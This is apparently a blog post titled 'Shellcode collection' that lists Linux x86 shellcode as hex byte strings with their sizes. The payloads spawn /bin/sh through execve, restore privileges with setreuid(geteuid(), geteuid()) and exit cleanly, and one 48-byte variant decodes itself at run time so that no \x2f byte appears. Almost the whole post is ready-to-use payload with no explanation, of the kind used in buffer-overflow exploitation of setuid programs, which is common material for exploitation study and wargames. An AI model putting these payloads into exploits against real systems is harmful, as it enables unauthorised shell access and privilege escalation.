  • Shellcode collection
    hacking/system 2018. 11. 14. 02:40

    // 16 Byte, setreuid( geteuid() , geteuid() );

    \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80


    // 25 Byte, shellcode

    \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80


    // 41 Byte

    \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80


    // 48 Byte, without \x2f

    \xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81



    Source: http://j4ckp4rd.tistory.com/44 [잭파드의 외장뇌]


    --------------------------------------------------------------------------------------------------------------------------------------------------------------------


    0x01. The most basic code for spawning a shell

    \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

    bytes : 25

    Not included: setreuid(), exit()


    0x02. Code that also terminates cleanly with exit(0) when the shell exits

    \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

    \x31\xc0\xb0\x01\xcd\x80

    bytes : 31

    Not included: setreuid()


    0x03. Shellcode that also includes setreuid(geteuid(), geteuid()) and exit(0)

    \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80

    bytes : 47


    0x04. exit(0) code

    \x31\xc0\xb0\x01\xcd\x80

    bytes : 6


    0x05. setreuid(geteuid(), geteuid()) code

    \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80

    bytes : 16 


    Linux/x86 execve /bin/sh shellcode 23 bytes 

    \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80


    Linux x86 file-name shellcode, 48 bytes

    \xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81


    --------------------------------------------------------------------------------------------------------------------------------------------------------------------

